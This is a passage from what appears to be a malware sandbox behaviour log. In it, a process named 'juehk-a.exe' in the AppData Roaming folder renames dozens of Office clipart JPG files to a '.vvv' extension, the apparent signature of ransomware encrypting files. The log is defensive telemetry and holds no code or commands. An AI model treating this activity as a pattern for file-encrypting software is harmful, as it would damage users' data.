29743.            ads:
29744.          fid (ads:): 562949953497798
29745.          ntstatus: 0x0
29746.          CreateOptions: 0x0
29747.        file:
29748.          timestamp: 95289
29749.          mode: rename
29750.          sequenceNumber: 2101
29751.          filesize: 20606
29752.          processinfo:
29753.            pid: 1648
29754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29756.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG
29757.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.vvv
29758.            ads:
29759.          fid (ads:): 562949953497799
29760.          ntstatus: 0x0
29761.          CreateOptions: 0x0
29762.        file:
29763.          timestamp: 95301
29764.          mode: rename
29765.          sequenceNumber: 2102
29766.          filesize: 3710
29767.          processinfo:
29768.            pid: 1648
29769.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29771.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG
29772.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.vvv
29773.            ads:
29774.          fid (ads:): 562949953497816
29775.          ntstatus: 0x0
29776.          CreateOptions: 0x0
29777.        file:
29778.          timestamp: 95313
29779.          mode: rename
29780.          sequenceNumber: 2103
29781.          filesize: 17166
29782.          processinfo:
29783.            pid: 1648
29784.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29786.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG
29787.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.vvv
29788.            ads:
29789.          fid (ads:): 562949953497817
29790.          ntstatus: 0x0
29791.          CreateOptions: 0x0
29792.        file:
29793.          timestamp: 95324
29794.          mode: rename
29795.          sequenceNumber: 2104
29796.          filesize: 24958
29797.          processinfo:
29798.            pid: 1648
29799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29801.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG
29802.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG.vvv
29803.            ads:
29804.          fid (ads:): 562949953497818
29805.          ntstatus: 0x0
29806.          CreateOptions: 0x0
29807.        file:
29808.          timestamp: 95336
29809.          mode: rename
29810.          sequenceNumber: 2105
29811.          filesize: 9502
29812.          processinfo:
29813.            pid: 1648
29814.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29815.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29816.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG
29817.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG.vvv
29818.            ads:
29819.          fid (ads:): 562949953497819
29820.          ntstatus: 0x0
29821.          CreateOptions: 0x0
29822.        file:
29823.          timestamp: 95346
29824.          mode: rename
29825.          sequenceNumber: 2106
29826.          filesize: 8494
29827.          processinfo:
29828.            pid: 1648
29829.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29830.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29831.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG
29832.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.vvv
29833.            ads:
29834.          fid (ads:): 562949953497820
29835.          ntstatus: 0x0
29836.          CreateOptions: 0x0
29837.        file:
29838.          timestamp: 95358
29839.          mode: rename
29840.          sequenceNumber: 2107
29841.          filesize: 44318
29842.          processinfo:
29843.            pid: 1648
29844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29846.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG
29847.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG.vvv
29848.            ads:
29849.          fid (ads:): 562949953497821
29850.          ntstatus: 0x0
29851.          CreateOptions: 0x0
29852.        file:
29853.          timestamp: 95465
29854.          mode: rename
29855.          sequenceNumber: 2108
29856.          filesize: 62782
29857.          processinfo:
29858.            pid: 1648
29859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29861.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG
29862.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG.vvv
29863.            ads:
29864.          fid (ads:): 562949953497822
29865.          ntstatus: 0x0
29866.          CreateOptions: 0x0
29867.        file:
29868.          timestamp: 95496
29869.          mode: rename
29870.          sequenceNumber: 2109
29871.          filesize: 40654
29872.          processinfo:
29873.            pid: 1648
29874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29876.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG
29877.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.vvv
29878.            ads:
29879.          fid (ads:): 562949953498009
29880.          ntstatus: 0x0
29881.          CreateOptions: 0x0
29882.        file:
29883.          timestamp: 95513
29884.          mode: rename
29885.          sequenceNumber: 2110
29886.          filesize: 34078
29887.          processinfo:
29888.            pid: 1648
29889.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29891.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG
29892.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.vvv
29893.            ads:
29894.          fid (ads:): 562949953498010
29895.          ntstatus: 0x0
29896.          CreateOptions: 0x0
29897.        file:
29898.          timestamp: 95525
29899.          mode: rename
29900.          sequenceNumber: 2111
29901.          filesize: 62062
29902.          processinfo:
29903.            pid: 1648
29904.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29905.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29906.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG
29907.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.vvv
29908.            ads:
29909.          fid (ads:): 562949953498011
29910.          ntstatus: 0x0
29911.          CreateOptions: 0x0
29912.        file:
29913.          timestamp: 95537
29914.          mode: rename
29915.          sequenceNumber: 2112
29916.          filesize: 49662
29917.          processinfo:
29918.            pid: 1648
29919.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29920.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29921.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG
29922.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.vvv
29923.            ads:
29924.          fid (ads:): 562949953498012
29925.          ntstatus: 0x0
29926.          CreateOptions: 0x0
29927.        file:
29928.          timestamp: 95549
29929.          mode: rename
29930.          sequenceNumber: 2113
29931.          filesize: 21550
29932.          processinfo:
29933.            pid: 1648
29934.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29935.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29936.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG
29937.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.vvv
29938.            ads:
29939.          fid (ads:): 562949953498013
29940.          ntstatus: 0x0
29941.          CreateOptions: 0x0
29942.        file:
29943.          timestamp: 95559
29944.          mode: rename
29945.          sequenceNumber: 2114
29946.          filesize: 18286
29947.          processinfo:
29948.            pid: 1648
29949.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29950.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29951.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG
29952.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.vvv
29953.            ads:
29954.          fid (ads:): 562949953498014
29955.          ntstatus: 0x0
29956.          CreateOptions: 0x0
29957.        file:
29958.          timestamp: 95571
29959.          mode: rename
29960.          sequenceNumber: 2115
29961.          filesize: 32270
29962.          processinfo:
29963.            pid: 1648
29964.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29965.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29966.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG
29967.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.vvv
29968.            ads:
29969.          fid (ads:): 562949953498015
29970.          ntstatus: 0x0
29971.          CreateOptions: 0x0
29972.        file:
29973.          timestamp: 95583
29974.          mode: rename
29975.          sequenceNumber: 2116
29976.          filesize: 37246
29977.          processinfo:
29978.            pid: 1648
29979.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29981.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG
29982.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.vvv
29983.            ads:
29984.          fid (ads:): 562949953498016
29985.          ntstatus: 0x0
29986.          CreateOptions: 0x0
29987.        file:
29988.          timestamp: 95595
29989.          mode: rename
29990.          sequenceNumber: 2117
29991.          filesize: 37214
29992.          processinfo:
29993.            pid: 1648
29994.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29996.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG
29997.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.vvv
29998.            ads:
29999.          fid (ads:): 562949953498017
30000.          ntstatus: 0x0
30001.          CreateOptions: 0x0
30002.        file:
30003.          timestamp: 95617
30004.          mode: rename
30005.          sequenceNumber: 2118
30006.          filesize: 35838
30007.          processinfo:
30008.            pid: 1648
30009.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30010.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30011.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG
30012.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.vvv
30013.            ads:
30014.          fid (ads:): 562949953498018
30015.          ntstatus: 0x0
30016.          CreateOptions: 0x0
30017.        file:
30018.          timestamp: 95628
30019.          mode: rename
30020.          sequenceNumber: 2119
30021.          filesize: 34382
30022.          processinfo:
30023.            pid: 1648
30024.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30026.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG
30027.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.vvv
30028.            ads:
30029.          fid (ads:): 562949953498019
30030.          ntstatus: 0x0
30031.          CreateOptions: 0x0
30032.        file:
30033.          timestamp: 95640
30034.          mode: rename
30035.          sequenceNumber: 2120
30036.          filesize: 39966
30037.          processinfo:
30038.            pid: 1648
30039.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30041.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG
30042.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.vvv
30043.            ads:
30044.          fid (ads:): 562949953498020
30045.          ntstatus: 0x0
30046.          CreateOptions: 0x0
30047.        file:
30048.          timestamp: 95651
30049.          mode: rename
30050.          sequenceNumber: 2121
30051.          filesize: 46926
30052.          processinfo:
30053.            pid: 1648
30054.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30055.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30056.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG
30057.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.vvv
30058.            ads:
30059.          fid (ads:): 562949953498021
30060.          ntstatus: 0x0
30061.          CreateOptions: 0x0
30062.        file:
30063.          timestamp: 95662
30064.          mode: rename
30065.          sequenceNumber: 2122
30066.          filesize: 44094
30067.          processinfo:
30068.            pid: 1648
30069.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30071.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG
30072.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.vvv
30073.            ads:
30074.          fid (ads:): 562949953498022
30075.          ntstatus: 0x0
30076.          CreateOptions: 0x0
30077.        file:
30078.          timestamp: 95673
30079.          mode: rename
30080.          sequenceNumber: 2123
30081.          filesize: 67966
30082.          processinfo:
30083.            pid: 1648
30084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30086.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG
30087.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.vvv
30088.            ads:
30089.          fid (ads:): 562949953498023
30090.          ntstatus: 0x0
30091.          CreateOptions: 0x0
30092.        file:
30093.          timestamp: 95688
30094.          mode: rename
30095.          sequenceNumber: 2124
30096.          filesize: 38654
30097.          processinfo:
30098.            pid: 1648
30099.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30100.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30101.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG
30102.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.vvv
30103.            ads:
30104.          fid (ads:): 562949953498024
30105.          ntstatus: 0x0
30106.          CreateOptions: 0x0
30107.        file:
30108.          timestamp: 95700
30109.          mode: rename
30110.          sequenceNumber: 2125
30111.          filesize: 27822
30112.          processinfo:
30113.            pid: 1648
30114.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30115.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30116.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG
30117.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.vvv
30118.            ads:
30119.          fid (ads:): 562949953498025
30120.          ntstatus: 0x0
30121.          CreateOptions: 0x0
30122.        file:
30123.          timestamp: 95712
30124.          mode: rename
30125.          sequenceNumber: 2126
30126.          filesize: 65230
30127.          processinfo:
30128.            pid: 1648
30129.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30130.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30131.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG
30132.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.vvv
30133.            ads:
30134.          fid (ads:): 562949953498026
30135.          ntstatus: 0x0
30136.          CreateOptions: 0x0
30137.        file:
30138.          timestamp: 95743
30139.          mode: rename
30140.          sequenceNumber: 2127
30141.          filesize: 46910
30142.          processinfo:
30143.            pid: 1648
30144.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30145.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30146.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG
30147.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.vvv
30148.            ads:
30149.          fid (ads:): 562949953498101
30150.          ntstatus: 0x0
30151.          CreateOptions: 0x0
30152.        file:
30153.          timestamp: 95755
30154.          mode: rename
30155.          sequenceNumber: 2128
30156.          filesize: 25406
30157.          processinfo:
30158.            pid: 1648
30159.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30161.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG
30162.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.vvv
30163.            ads:
30164.          fid (ads:): 562949953498111
30165.          ntstatus: 0x0
30166.          CreateOptions: 0x0
30167.        file:
30168.          timestamp: 95768
30169.          mode: rename
30170.          sequenceNumber: 2129
30171.          filesize: 46878
30172.          processinfo:
30173.            pid: 1648
30174.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30176.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG
30177.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.vvv
30178.            ads:
30179.          fid (ads:): 562949953498112
30180.          ntstatus: 0x0
30181.          CreateOptions: 0x0
30182.        file:
30183.          timestamp: 95780
30184.          mode: rename
30185.          sequenceNumber: 2130
30186.          filesize: 14974
30187.          processinfo:
30188.            pid: 1648
30189.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30190.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30191.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG
30192.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.vvv
30193.            ads:
30194.          fid (ads:): 562949953498113
30195.          ntstatus: 0x0
30196.          CreateOptions: 0x0
30197.        file:
30198.          timestamp: 95791
30199.          mode: rename
30200.          sequenceNumber: 2131
30201.          filesize: 45774
30202.          processinfo:
30203.            pid: 1648
30204.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30206.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG
30207.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.vvv
30208.            ads:
30209.          fid (ads:): 562949953498114
30210.          ntstatus: 0x0
30211.          CreateOptions: 0x0
30212.        file:
30213.          timestamp: 95803
30214.          mode: rename
30215.          sequenceNumber: 2132
30216.          filesize: 55982
30217.          processinfo:
30218.            pid: 1648
30219.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30220.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30221.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG
30222.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.vvv
30223.            ads:
30224.          fid (ads:): 562949953498115
30225.          ntstatus: 0x0
30226.          CreateOptions: 0x0
30227.        file:
30228.          timestamp: 95815
30229.          mode: rename
30230.          sequenceNumber: 2133
30231.          filesize: 37406
30232.          processinfo:
30233.            pid: 1648
30234.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30235.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30236.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG
30237.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.vvv
30238.            ads:
30239.          fid (ads:): 562949953498116
30240.          ntstatus: 0x0
30241.          CreateOptions: 0x0
30242.        file:
30243.          timestamp: 95826
30244.          mode: rename
30245.          sequenceNumber: 2134
30246.          filesize: 29630
30247.          processinfo:
30248.            pid: 1648
30249.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30250.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30251.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG
30252.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.vvv
30253.            ads:
30254.          fid (ads:): 562949953498117
30255.          ntstatus: 0x0
30256.          CreateOptions: 0x0
30257.        file:
30258.          timestamp: 95852
30259.          mode: rename
30260.          sequenceNumber: 2135
30261.          filesize: 26958
30262.          processinfo:
30263.            pid: 1648
30264.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30266.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG
30267.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.vvv
30268.            ads:
30269.          fid (ads:): 562949953498118
30270.          ntstatus: 0x0
30271.          CreateOptions: 0x0
30272.        file:
30273.          timestamp: 95862
30274.          mode: rename
30275.          sequenceNumber: 2136
30276.          filesize: 24462
30277.          processinfo:
30278.            pid: 1648
30279.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30280.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30281.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG
30282.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.vvv
30283.            ads:
30284.          fid (ads:): 1125899906919431
30285.          ntstatus: 0x0
30286.          CreateOptions: 0x0
30287.        file:
30288.          timestamp: 95874
30289.          mode: rename
30290.          sequenceNumber: 2137
30291.          filesize: 23758
30292.          processinfo:
30293.            pid: 1648
30294.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30296.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG
30297.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.vvv
30298.            ads:
30299.          fid (ads:): 844424930208776
30300.          ntstatus: 0x0
30301.          CreateOptions: 0x0
30302.        file:
30303.          timestamp: 95885
30304.          mode: rename
30305.          sequenceNumber: 2138
30306.          filesize: 32462
30307.          processinfo:
30308.            pid: 1648
30309.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30310.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30311.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG
30312.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.vvv
30313.            ads:
30314.          fid (ads:): 562949953498121
30315.          ntstatus: 0x0
30316.          CreateOptions: 0x0
30317.        file:
30318.          timestamp: 95896
30319.          mode: rename
30320.          sequenceNumber: 2139
30321.          filesize: 35758
30322.          processinfo:
30323.            pid: 1648
30324.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30325.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30326.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG
30327.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.vvv
30328.            ads:
30329.          fid (ads:): 562949953498122
30330.          ntstatus: 0x0
30331.          CreateOptions: 0x0
30332.        file:
30333.          timestamp: 95908
30334.          mode: rename
30335.          sequenceNumber: 2140
30336.          filesize: 32526
30337.          processinfo:
30338.            pid: 1648
30339.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30340.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30341.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG
30342.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.vvv
30343.            ads:
30344.          fid (ads:): 562949953498123
30345.          ntstatus: 0x0
30346.          CreateOptions: 0x0
30347.        file:
30348.          timestamp: 95919
30349.          mode: rename
30350.          sequenceNumber: 2141
30351.          filesize: 17038
30352.          processinfo:
30353.            pid: 1648
30354.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30355.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30356.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG
30357.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.vvv
30358.            ads:
30359.          fid (ads:): 562949953498124
30360.          ntstatus: 0x0
30361.          CreateOptions: 0x0
30362.        file:
30363.          timestamp: 95933
30364.          mode: rename
30365.          sequenceNumber: 2142
30366.          filesize: 42670
30367.          processinfo:
30368.            pid: 1648
30369.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30370.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30371.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG
30372.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG.vvv
30373.            ads:
30374.          fid (ads:): 562949953498232
30375.          ntstatus: 0x0
30376.          CreateOptions: 0x0
30377.        file:
30378.          timestamp: 95946
30379.          mode: rename
30380.          sequenceNumber: 2143
30381.          filesize: 43310
30382.          processinfo:
30383.            pid: 1648
30384.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30385.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30386.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG
30387.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.vvv
30388.            ads:
30389.          fid (ads:): 562949953498249
30390.          ntstatus: 0x0
30391.          CreateOptions: 0x0
30392.        file:
30393.          timestamp: 95958
30394.          mode: rename
30395.          sequenceNumber: 2144
30396.          filesize: 22046
30397.          processinfo:
30398.            pid: 1648
30399.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30400.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30401.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG
30402.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG.vvv
30403.            ads:
30404.          fid (ads:): 562949953498250
30405.          ntstatus: 0x0
30406.          CreateOptions: 0x0
30407.        file:
30408.          timestamp: 95970
30409.          mode: rename
30410.          sequenceNumber: 2145
30411.          filesize: 35966
30412.          processinfo:
30413.            pid: 1648
30414.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30415.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30416.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG
30417.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.vvv
30418.            ads:
30419.          fid (ads:): 562949953498259
30420.          ntstatus: 0x0
30421.          CreateOptions: 0x0
30422.        file:
30423.          timestamp: 95995
30424.          mode: rename
30425.          sequenceNumber: 2146
30426.          filesize: 58510
30427.          processinfo:
30428.            pid: 1648
30429.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30430.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30431.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG
30432.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG.vvv
30433.            ads:
30434.          fid (ads:): 562949953498260
30435.          ntstatus: 0x0
30436.          CreateOptions: 0x0
30437.        file:
30438.          timestamp: 96013
30439.          mode: rename
30440.          sequenceNumber: 2147
30441.          filesize: 35662
30442.          processinfo:
30443.            pid: 1648
30444.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30445.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30446.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG
30447.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG.vvv
30448.            ads:
30449.          fid (ads:): 562949953498345
30450.          ntstatus: 0x0
30451.          CreateOptions: 0x0
30452.        file:
30453.          timestamp: 96025
30454.          mode: rename
30455.          sequenceNumber: 2148
30456.          filesize: 17534
30457.          processinfo:
30458.            pid: 1648
30459.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30460.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30461.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG
30462.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.vvv
30463.            ads:
30464.          fid (ads:): 562949953498346
30465.          ntstatus: 0x0
30466.          CreateOptions: 0x0
30467.        file:
30468.          timestamp: 96043
30469.          mode: rename
30470.          sequenceNumber: 2149
30471.          filesize: 16446
30472.          processinfo:
30473.            pid: 1648
30474.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30475.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30476.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG
30477.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG.vvv
30478.            ads:
30479.          fid (ads:): 562949953498347
30480.          ntstatus: 0x0
